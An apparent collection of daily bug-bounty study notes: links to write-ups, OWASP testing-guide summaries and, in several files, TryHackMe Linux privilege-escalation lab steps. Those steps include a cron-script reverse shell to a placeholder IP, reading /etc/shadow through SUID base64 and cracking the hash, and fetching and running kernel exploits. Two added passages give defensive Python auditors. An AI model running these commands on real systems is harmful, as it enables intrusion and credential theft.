https://medium.com/techiepedia/how-to-report-dmarc-vulnerabilities-efficiently-to-earn-bounties-easily-f7a65ecdd20b
https://shahjerry33.medium.com/mail-server-misconfiguration-f42734d19678
✅ Youtube Video
https://www.youtube.com/watch?v=LNwjEK4Ckyc
https://www.youtube.com/watch?v=nlFAj2raoj4
✅ THM Room
https://tryhackme.com/room/overlayfs
#bugbounty #infosec #learn365
================================================
FILE: Resources/Day 09 Task.md
================================================
🎯 Day 9 Task
✅ CSRF Video
https://www.youtube.com/watch?v=iyE9UsBF64w
✅ POC
https://www.youtube.com/watch?v=TGJ4I-F5LhE
https://www.youtube.com/watch?v=YPnejsLPfVk
https://www.youtube.com/watch?v=gBdiKqNPQS8
https://www.youtube.com/watch?v=5jHIUTEdpvI
✅ CSRF Writeup
https://infosecwriteups.com/understanding-exploiting-cross-site-request-forgery-csrf-vulnerabilities-935952375b71
https://huntr.dev/bounties/f952af13-8042-457d-b8d8-bd338987dc02/
✅ Tweet
https://twitter.com/rootxyash/status/1480126074994368512
https://twitter.com/mavericknerd/status/1214071332083658757
-----------------------------------------------------------------------------------
🔁 THM Room
➡ Working on Linux PrivEsc Room
✅ Completed till Task 6 Privilege Escalation Sudo
https://tryhackme.com/room/linprivesc
For more Info check out my Github Repo
https://github.com/Imran407704/Learn365/
Some Tips :
The Kernel exploit methodology is simple :
1. Identify the kernel version
2. Search and find an exploit code for the kernel version of the target system
3. Run the exploit
Remember that: a failed kernel exploit can lead to a system crash :P
The Sudo exploit methodology :
1. First check how many programs a normal user can run with sudo rights - sudo -l
2. Go to https://gtfobins.github.io & search for the binary that has sudo rights
3. Paste that command & you are the root user :)
Some Keywords :
| String | Meaning |
| ----------------- | --------------------------------- |
| Local system | My Computer |
| EXPL_FILE | Name of that Particular Exploit (in my case the name of exploit is 37292) |
| IP:PORT | VPN IP (if you are on TryHackMe) / local system IP : the port on which the HTTP server was started |
| - (hyphen) | The command comes after the hyphen :) |
My Steps for Kernel Exploit :
1. Downloaded the exploit to the local system - wget https://www.exploit-db.com/exploits/EXPL_FILE
2. Compiled it with gcc - gcc 37292.c exploit
3. Started an HTTP server on the local system - sudo python3 -m http.server
4. Then go to the tmp (temp) directory on the target machine, because this is the directory where we have write permission. I also checked the home directory, but there I was not able to transfer the exploit from the local machine - wget http://IP:PORT/exploit (remember to use http, not https)
5. ./exploit
ROOT User :)
My Steps for Sudo Exploit :
1. First check how many programs a normal user can run with sudo rights - sudo -l
2. Go to https://gtfobins.github.io & search for the binary that has sudo rights
------------------------------------------------------------------------------------------------------------------------------------------------------
#bugbounty #privesc #infosec #learn365
================================================
FILE: Resources/Day 10 Task.md
================================================
🎯 Day 10 Task
✅ Clickjacking
https://www.youtube.com/watch?v=Unu41TIk8CY
✅ Poc
https://www.youtube.com/watch?v=rz2XmteeFMo
✅ Writeup
https://medium.com/@raushanraj_65039/google-clickjacking-6a04132b918a
https://hackerone.com/reports/299009
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 7 Privilege Escalation SUID
😒 I Saw a Walkthrough bcoz this is my 1st PrivEsc
Some Tips:
Got the user's name from **cat /etc/passwd** (1st answer)
Command for listing the binary files that have the SUID & SGID bits
**find / -type f -perm -04000 -ls 2>/dev/null**
Looked up each binary on GTFOBins to see whether there is an exploit with SUID; found **base64**
Then **LFILE=/etc/shadow**
**/usr/bin/base64 "$LFILE" | base64 --decode** : extracted the password hash this way & then saved the hash in a file **hash.txt**
**john hash.txt --show** : got the password
**su user2 & passwd**
**cd home/ubuntu**
**cat flag3.txt** but permission denied then
Then try **LFILE=/home/ubuntu/flag3.txt**
**/usr/bin/base64 "$LFILE" | base64 --decode**
**cat flag3.txt** & got flag :)
================================================
FILE: Resources/Day 100 Task.md
================================================
🎯 Day 100 Task
🥳🥳🥳 Yay, glad to share that I am consistently learning #infosec #bugbounty & today is my #Day100. I learned a lot of new things & explored new stuff daily. This is the best feeling ever & this is my small achievement. 🥳🥳🥳
Alhamdulillah For everything !!!!
✅ RCE with Flask Jinja Template Injection
https://akshukatkar.medium.com/rce-with-flask-jinja-template-injection-ea5d0201b870
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 101 Task.md
================================================
🎯 Day 101 Task
✅ How I could have hacked your Uber account
https://www.appsecure.security/blog/how-i-could-have-hacked-your-uber-account
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 102 Task.md
================================================
🎯 Day 102 Task
✅ Bug Bounty Live Recon - Linked / JS Discovery!
https://youtu.be/yT_IqBMwLFg
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 103 Task.md
================================================
🎯 Day 103 Task
✅ HTTP Request Smuggling on business.apple.com and Others
https://medium.com/@StealthyBugs/http-request-smuggling-on-business-apple-com-and-others-2c43e81bcc52
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 104 Task.md
================================================
🎯 Day 104 Task
✅ SVG SSRFs and saga of bypasses
https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7
✅ A Detailed Guide on Cewl
https://www.hackingarticles.in/a-detailed-guide-on-cewl/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 105 Task.md
================================================
🎯 Day 105 Task
✅ How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
https://infosecwriteups.com/how-a-youtube-video-lead-to-pwning-a-web-application-via-sql-injection-worth-4324-bounty-285f0a9b9f6c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 106 Task.md
================================================
🎯 Day 106 Task
✅ XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain
https://medium.com/@Bishoo97x/xss-html-injection-and-file-upload-bypass-in-huawei-subdomain-64966ba4f4ac
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 107 Task.md
================================================
🎯 Day 107 Task
✅ How Token Misconfiguration can lead to takeover account
https://cryptograph3r.blogspot.com/2022/03/how-token-misconfiguration-can-lead-to.html
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 108 Task.md
================================================
🎯 Day 108 Task
✅ How to hack any Payment Gateway?
https://infosecwriteups.com/how-to-hack-any-payment-gateway-1ae2f0c6cbe5
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 109 Task.md
================================================
🎯 Day 109 Task
✅ Race Condition bypassing team limit
https://arbazhussain.medium.com/race-condition-bypassing-team-limit-b162e777ca3b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 11 Task.md
================================================
🎯 Day 11 Task
✅ Learn Something new in Live Bug Hunting Session
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 8 Privilege Escalation **Capabilities**
My Steps :
First enter this command for checking how many binaries have capabilities
**getcap -r / 2>/dev/null**
Then I go to the home & other user directory **cd /home/ubuntu** & then **ls -a**
**id**
**cat flag4.txt**
#learn365 #infosec
================================================
FILE: Resources/Day 110 Task.md
================================================
🎯 Day 110 Task
✅ Bypass Apple Corp SSO on Apple Admin Panel
https://medium.com/@StealthyBugs/bypass-apple-corp-sso-on-apple-admin-panel-dbfb72c7e634
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 111 Task.md
================================================
🎯 Day 111 Task
✅ The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise
https://logicbomb.medium.com/the-unusual-case-of-open-redirection-to-aws-security-credentials-compromise-59acc312f02b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 112 Task.md
================================================
🎯 Day 112 Task
✅ Find security bugs while you sleep! Using nuclei templates, and more..
https://youtu.be/P5asvR0h3OQ
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 113 Task.md
================================================
🎯 Day 113 Task
✅ Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings
https://medium.com/@johnssimon_6607/getting-access-to-disabled-hidden-features-with-the-help-of-burp-match-and-replace-e1d7b70d131e
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 114 Task.md
================================================
🎯 Day 114 Task
✅ Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 115 Task.md
================================================
🎯 Day 115 Task
✅ How I chained two vulnerabilities to steal credit card details?
https://www.codedbrain.com/how-i-chained-two-vulnerabilities-to-steal-credit-card-details/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 116 Task.md
================================================
🎯 Day 116 Task
✅ How I Made The BBC Hall Of Fame 3 Times
https://medium.com/@tobydavenn/how-i-made-the-bbc-hall-of-fame-3-times-2c816fa515d7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 117 Task.md
================================================
🎯 Day 117 Task
✅ Improper cookie not expiring after logged out!
https://medium.com/@mujios101/improper-cookie-not-expiring-after-logged-out-ba43e9033459
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 118 Task.md
================================================
🎯 Day 118 Task
✅ Open-Redirects
https://medium.com/@souravgro25/open-redirects-a93b01f31868
✅ What you doing wrong when you fail at bug bounties?
https://medium.com/@gguzelkokar.mdbf15/what-you-doing-wrong-when-you-fail-at-bug-bounties-143d2e0e6e2b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 119 Task.md
================================================
🎯 Day 119 Task
✅ Bypassing WAF for $2222
https://divyanshsharma2401.medium.com/bypassing-waf-for-2222-f99b80cfdb9b
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 12 Task.md
================================================
🎯 Day 12 Task
➡️ Working on Bug bounty Wordlist tool inspired by [Kathan Patel](https://twitter.com/KathanP19)
🔁 TryHackMe Room
➡️ Working on Linux PrivEsc
✅ Completed Task 9 Privilege Escalation Cronjob
My Steps :
First find how many cronjobs set ?
**cat /etc/crontab**
then edit the script **nano /../..file.sh**
**#!/bin/bash
bash -i >& /dev/tcp/IP/PORT 0>1** ---------------> [ Here IP = TryHackMe VPN IP & Same PORT number which you use in nc ]
then run **nc -lvnp PORT**
wait some minutes & then you got root shell :)
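A defender-side check for the weakness this walkthrough relies on: a root cron job whose script, or the directory holding it, can be changed by a normal user. This is an added example, not part of the original notes; the sample crontab, its paths and all function names are constructed for illustration.

```python
import os
import re
import shlex
import stat

# Constructed /etc/crontab content (paths and users are made up for the example).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /home/alice/backup.sh
*/5 *   * * *   root    /opt/maint/cleanup.sh --quiet
@reboot         root    /usr/local/bin/startup.sh
0 3     * * *   alice   /home/alice/report.sh
"""


def crontab_jobs(text):
    """Yield (user, command) for every job line in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
            continue  # blank line, comment, or environment assignment
        if line.startswith("@"):            # @reboot, @daily, ...: keyword user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[1], fields[2]
        else:                               # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) == 7:
                yield fields[5], fields[6]


def command_paths(command):
    """Absolute paths mentioned in a cron command line."""
    try:
        tokens = shlex.split(command)
    except ValueError:                      # unbalanced quotes: fall back to whitespace
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def weaknesses(path, stat_fn):
    """Reasons why a non-root user could change what `path` contains."""
    try:
        st = stat_fn(path)
    except OSError:
        return ["does not exist"]
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_root_cron(text, stat_fn=os.stat):
    """Return [(path, reason)] for files and parent directories used by root's jobs."""
    findings, seen = [], set()
    for user, command in crontab_jobs(text):
        if user != "root":
            continue
        for path in command_paths(command):
            # A writable parent directory lets the script be replaced, so check both.
            for target in (path, os.path.dirname(path)):
                if target in seen:
                    continue
                seen.add(target)
                findings.extend((target, r) for r in weaknesses(target, stat_fn))
    return findings


if __name__ == "__main__":
    # On a real host this stats the live filesystem.
    with open("/etc/crontab") as fh:
        for path, reason in audit_root_cron(fh.read()):
            print(f"{path}: {reason}")
```

Every finding is something to fix by making the script and its directory root-owned and not writable by group or others, or by removing the stale job.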
#infosec #learn365 #privesc
================================================
FILE: Resources/Day 120 Task.md
================================================
🎯 Day 120 Task
✅ Subdomain Takeover using Mobile??
https://0xshakhawat.medium.com/subdomain-takeover-using-mobile-da9c8e81bc1c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 121 Task.md
================================================
🎯 Day 121 Task
✅ Fuzzing and credentials leakage..awesome bug hunting writeup
https://medium.com/@abdalrahman.alshammas/fuzzing-and-credentials-leakage-nice-bug-hunting-writeup-38b2e774b300
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 122 Task.md
================================================
🎯 Day 122 Task
✅ OTP bypass with response manipulation.
https://ertugrull.medium.com/otp-bypass-with-response-manipulation-12646c6d7f33
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 123 Task.md
================================================
🎯 Day 123 Task
There is no task Today Enjoy Eid Festival
🥳😊😃
#learn365 #eid2022 #eidmubarak2022
================================================
FILE: Resources/Day 124 Task.md
================================================
🎯 Day 124 Task
✅ An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
https://medium.com/@daniel.j.hunt/an-bug-bounty-hunters-guide-to-idor-vulnerabilities-27012bbccd7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 125 Task.md
================================================
🎯 Day 125 Task
✅ How I got a lousyT-Shirt from the Dutch Government.
https://maxva.medium.com/how-i-got-a-lousyt-shirt-from-the-dutch-goverment-2a0d13fe7675
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 126 Task.md
================================================
🎯 Day 126 Task
✅ Hack the HAckers
https://raoshaab.medium.com/hack-the-hackers-7d4ffbc70858
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 127 Task.md
================================================
🎯 Day 127 Task
✅ The $16,000 Dev Mistake
https://medium.com/@masonhck357/the-16-000-dev-mistake-13e516e86be6
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 128 Task.md
================================================
🎯 Day 128 Task
✅ Denial of Service through …
https://medium.com/@sathvika03/denial-of-service-through-55368b323839
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 129 Task.md
================================================
🎯 Day 129 Task
✅ How i found a vulnerability that leads to access any users’ sensitive data and got $500
https://medium.com/@robert0/how-did-i-find-a-vulnerability-that-leads-to-access-any-users-sensitive-data-and-got-500-5cce1c21d86a
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 13 Task.md
================================================
🎯 Day 13 Task
✅ Start Learning OWASP Web Application Security Testing
4.1 Information Gathering
✅ 4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage
https://infosecwriteups.com/dorking-for-bug-bounties-d81cc857b2c8
✅ Tools
https://github.com/BullsEye0/dorks-eye
🔁 THM Room
⏸️ Pause Linux PrivEsc
➡️ Working on Linux PrivEsc Arena
https://tryhackme.com/room/linuxprivescarena
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 130 Task.md
================================================
🎯 Day 130 Task
✅ ToolTime - Cloud Recon 1
https://youtu.be/7hKEfF-yR1w
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 131 Task.md
================================================
🎯 Day 131 Task
✅ A Fun SSRF through a Headless Browser
https://corben.io/fun-ssrf-via-headless-browser/
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 132 Task.md
================================================
🎯 Day 132 Task
✅ 2FA Bypass in PickMyCareer.in
https://jayateerthag.medium.com/2fa-bypass-in-pickmycareer-in-8abbde4c4903
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 133 Task.md
================================================
🎯 Day 133 Task
✅ Exploiting Google Maps API keys for profit
https://infosecwriteups.com/exploiting-google-maps-api-keys-for-profit-3903dd2c829c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 134 Task.md
================================================
🎯 Day 134 Task
✅ Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
https://medium.com/@unurbayar1998/creator-studios-api-endpoint-is-vulnerable-to-idor-exposes-p40-earnings-usd-f57327759ffc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 135 Task.md
================================================
🎯 Day 135 Task
✅ I have 1% chance to hack this company
https://infosecwriteups.com/i-have-1-chance-to-hack-this-company-1044879f41a9
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 136 Task.md
================================================
🎯 Day 136 Task
✅ HTTP Request Smuggling: Part-1 (Concepts)
https://medium.com/nerd-for-tech/http-request-smuggling-part-1-concepts-b89bfe17b210
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 137 Task.md
================================================
🎯 Day 137 Task
✅ Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
https://infosecwriteups.com/create-your-ultimate-bug-bounty-automation-without-nerdy-bash-skills-part-1-a78c2b109731
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 138 Task.md
================================================
🎯 Day 138 Task
✅ Can analyzing javascript files lead to remote code execution?
https://melotover.medium.com/can-analyzing-javascript-files-lead-to-remote-code-execution-f24112f1aa1f
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 139 Task.md
================================================
🎯 Day 139 Task
✅ My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Information's & In Some cases Passwords At More Than 1000 Companies
https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 14 Task.md
================================================
🎯 Day 14 Task
✅ 4.1.2 Fingerprint Web Server
_Objective_
Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
✅ How to Test
Nmap - **nmap -sV --script=banner TARGET**
Note : Exposed server information is not necessarily a vulnerability in itself; it is information that can assist attackers in exploiting other vulnerabilities that may exist.
✅ Remediation
1. Obscuring web server information in headers, such as with Apache’s mod_headers module.
2. Using a hardened reverse proxy server to create an additional layer of security between the web server and the Internet.
3. Ensuring that web servers are kept up-to-date with the latest software and security patches.
✅ THM Room
https://tryhackme.com/room/linuxprivescarena
Github Repo
https://github.com/Imran407704/Learn365
**Disclaimer- I am making notes from Official OWASP Website you can check it from here**
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 140 Task.md
================================================
🎯 Day 140 Task
✅ Origin IP found, WAF Cloudflare Bypass
https://hackerone.com/reports/1536299
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 141 Task.md
================================================
🎯 Day 141 Task
✅ MFA (Multi-Factor Authentication)
https://akash-venky091.medium.com/mfa-multi-factor-authentication-24d2002b9ad7
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 142 Task.md
================================================
🎯 Day 142 Task
✅ Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 143 Task.md
================================================
🎯 Day 143 Task
✅ Does ms15–034 still exist today ?
https://medium.com/@ryuukhagetsu/does-ms15-034-still-exist-today-c7e11664349c
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 144 Task.md
================================================
🎯 Day 144 Task
✅ How I managed to take over any account visits my profile with Stored XSS
https://0xmahmoudjo0.medium.com/how-i-managed-to-take-over-any-account-visits-my-profile-with-stored-xss-6b378d33e90f
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 145 Task.md
================================================
🎯 Day 145 Task
✅ The Bucket’s Got a Hole in it
https://medium.com/@manikesh-singh/the-buckets-got-a-hole-in-it-343b676e23d4
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 15 Task.md
================================================
🎯 Day 15 Task
✅ 4.1.3 Review Webserver Metafiles for Information Leakage
Objective
1. Identify hidden or obfuscated paths and functionality through the analysis of metadata files.
2. Extract and map other information that could lead to better understanding of the systems at hand.
✅ How to Test
Spider/crawler, Google Dorks, Burpsuite/ZAP
1. robots.txt - curl -O -Ss http://www.TARGET.TLD/robots.txt
2. Sitemap.xml - wget --no-verbose https://www.TARGET.TLD/sitemap.xml
3. Security.txt - wget --no-verbose https://www.linkedin.com/.well-known/security.txt
https://TARGET.TLD/security.txt or https://TARGET.TLD/.well-known/security.txt
4. humans.txt - wget --no-verbose https://www.google.com/humans.txt
✅ Tools
wget, BurpSuite, Dev Tools
✅ THM Room
https://tryhackme.com/room/linuxfundamentalspart3
Github Repo
https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 16 Task.md
================================================
🎯 Day 16 Task
✅ 4.1.4 Enumerate Applications on Webserver
Test Objectives
Enumerate the applications within scope that exist on a web server.
1. Different Base URL
2. Non-standard Ports
3. Virtual Hosts
4. DNS Zone Transfers
5. DNS Inverse Queries
6. Web-based DNS Searches
7. Reverse-IP Services
8. Googling
9. Digital Certificates
✅ Tools
1. nslookup, dig
2. Search engines - Google, Bing
3. Nmap
Github Repo
https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 17 Task.md
================================================
🎯 Day 17 Task
✅ 4.1.5 Review Webpage Content for Information Leakage
Test Objectives
1. Review webpage comments, metadata, and redirect bodies to find any information leakage.
2. Gather JavaScript files and review the JS code to better understand the application and to find any information leakage.
3. Identify if source map files or other front-end debug files exist.
How to Test
1. Review Webpage, Comments and Metadata
2. Identifying JavaScript Code and Gathering JavaScript Files (Look for values such as: API keys, internal IP addresses, sensitive routes, or credentials)
3. Identifying Source Map Files
4. Identify Redirect Responses which Leak Information
Tools
Burpsuite/ZAP
wget
✅ THM Room
https://tryhackme.com/room/passiverecon
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 18 Task.md
================================================
🎯 Day 18 Task
✅ P1 Bugs WriteUp
https://medium.com/@harrmahar/how-i-get-my-first-p1-sensitive-information-disclosure-using-wpscan-c2fba00ac361
https://medium.com/@sw33tlie/finding-a-p1-in-one-minute-with-shodan-io-rce-735e08123f52
https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4
✅ 4.1.6 Identify Application Entry Points
Test Objectives
1. Identify possible entry and injection points through request and response analysis.
Requests
1. Identify where GETs are used and where POSTs are used.
2. Identify all parameters used in a POST request (these are in the body of the request).
3. Within the POST request, pay special attention to any hidden parameters. When a POST is sent, all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren't seen unless a proxy is used or the HTML source code is viewed. In addition, the next page shown, its data, and the level of access can all be different depending on the value of the hidden parameter(s).
4. Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).
5. Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string, separated by a &, \~, :, or any other special character or encoding.
6. Also pay attention to any additional or custom type headers not typically seen (such as debug: false).
Responses
1. Identify where new cookies are set (Set-Cookie header), modified, or added to.
2. Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests).
3. Also note where any interesting headers are used. For example, Server: BIG-IP indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used.
✅ Tools
Burpsuite/ZAP
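The request and response checks listed above, written as a small inventory script that lists where input enters one form submission and which hidden fields come back as parameters. This is an added example, not from the original notes or from OWASP; the sample traffic, the ROUTINE_HEADERS list and all function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote_plus

# Headers a browser sends routinely; any other request header is flagged (assumed list).
ROUTINE_HEADERS = {"host", "user-agent", "accept", "accept-language", "accept-encoding",
                   "content-type", "content-length", "cookie", "connection", "referer", "origin"}

# Constructed sample traffic for one form submission.
SAMPLE_FORM_PAGE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=abc; Path=/; HttpOnly\r\n"
    "\r\n"
    '<form method="post" action="/account/update?lang=en">'
    '<input name="name"><input type="hidden" name="role" value="user">'
    '<input type="hidden" name="csrf_token" value="xyz"></form>'
)
SAMPLE_REQUEST = (
    "POST /account/update?lang=en HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 35\r\n"
    "Cookie: session=abc; theme=dark\r\n"
    "Debug: false\r\n"
    "\r\n"
    "name=alice&role=user&csrf_token=xyz"
)


class HiddenFields(HTMLParser):
    """Collect the names of <input type="hidden"> fields."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "hidden" and attrs.get("name"):
            self.names.append(attrs["name"])


def split_message(raw):
    """Split a raw HTTP message into (start line, [(header, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def param_names(encoded, separators="&"):
    """Parameter names from a query string or form body; separators may be e.g. '&~'."""
    pairs = re.split("[" + re.escape(separators) + "]", encoded)
    return [unquote_plus(p.partition("=")[0]) for p in pairs if p]


def request_entry_points(raw_request, separators="&"):
    """Every place in one request where client-controlled input reaches the application."""
    start, headers, body = split_message(raw_request)
    method, target, _version = start.split(" ", 2)
    by_name = {n.lower(): v for n, v in headers}
    form = by_name.get("content-type", "").startswith("application/x-www-form-urlencoded")
    cookies = [c.split("=", 1)[0].strip() for c in by_name.get("cookie", "").split(";")]
    return {
        "method": method,
        "query": param_names(urlsplit(target).query, separators),
        "body": param_names(body, separators) if form else [],
        "cookies": [c for c in cookies if c],
        "custom_headers": [n for n, _ in headers if n.lower() not in ROUTINE_HEADERS],
    }


def response_notes(raw_response):
    """Status code, cookies set and hidden form fields found in one response."""
    start, headers, body = split_message(raw_response)
    status = int(start.split(" ", 2)[1])
    parser = HiddenFields()
    parser.feed(body)
    return {
        "status": status,
        # 3xx redirects, 4xx codes (403 in particular) and 500 on unmodified requests
        "noteworthy_status": 300 <= status < 500 or status == 500,
        "set_cookies": [v.split("=", 1)[0].strip() for n, v in headers if n.lower() == "set-cookie"],
        "hidden_fields": parser.names,
    }


def hidden_fields_submitted(raw_response, raw_request):
    """Hidden form fields that come back as request parameters; the server must re-validate them."""
    hidden = response_notes(raw_response)["hidden_fields"]
    sent = request_entry_points(raw_request)
    return [n for n in hidden if n in sent["query"] + sent["body"]]
```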
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 19 Task.md
================================================
🎯 Day 19 Task
✅ Github Recon
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
https://nitter.net/therceman/status/1434587086011748354
✅ 4.1.7 Map Execution Paths Through Application
Test Objectives
Map the target application and understand the principal workflows.
How to Test
1. Path
Test each of the paths through an application that includes combinatorial and boundary value analysis testing for each decision path
2. Data Flow
Focuses on mapping the flow, transformation and use of data throughout an application.
3. Race
Tests multiple concurrent instances of the application manipulating the same data.
✅ Tools
Automatic Spidering (BurpSuite/ZAP)
Automatic spider is a tool used to automatically discover new resources (URLs) on a particular website.
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 20 Task.md
================================================
🎯 Day 20 Task
✅ Recon Techniques
https://securib.ee/beelog/the-best-bug-bounty-recon-methodology/
https://www.bugcrowd.com/resources/webinars/practical-recon-techniques-for-bug-hunters-pen-testers/
https://infosecsanyam.medium.com/bug-bounty-methodology-ttp-tactics-techniques-and-procedures-v-2-0-2ccd9d7eb2e2
✅ TryHackMe Room
https://tryhackme.com/room/pythonbasics
✅ 4.1.8 Fingerprint Web Application Framework
Test Objectives
Fingerprint the components being used by the web applications.
How to Test
1. HTTP headers
2. Cookies
3. HTML source code
4. Specific files and folders
5. File extensions
6. Error messages
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. HTTP headers - Identifying a web framework by **X-Powered-By** field in the HTTP response header. Use netcat command - **nc 127.0.0.1 80**
This methodology doesn't work in 100% of cases. It is possible to easily disable the **X-Powered-By** header with proper configuration.
